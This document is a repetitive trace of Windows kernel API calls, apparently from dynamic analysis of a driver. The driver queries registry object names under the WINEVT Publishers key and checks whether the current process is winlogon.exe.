| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfc, ret_val_ptr_out = 0xffffe0003af89f00 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0fc790, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0xfa, ret_val_ptr_out = 0xffffe0003af8ff00 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0fc790, Length = 0xfa, ObjectNameInfo_unk_out = 0xffffe0003af8ff00, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a}, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Publishers\{e6835967-e0d2-41fb-bcec-58387404e25a} | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af8ff00, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003af89f00, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
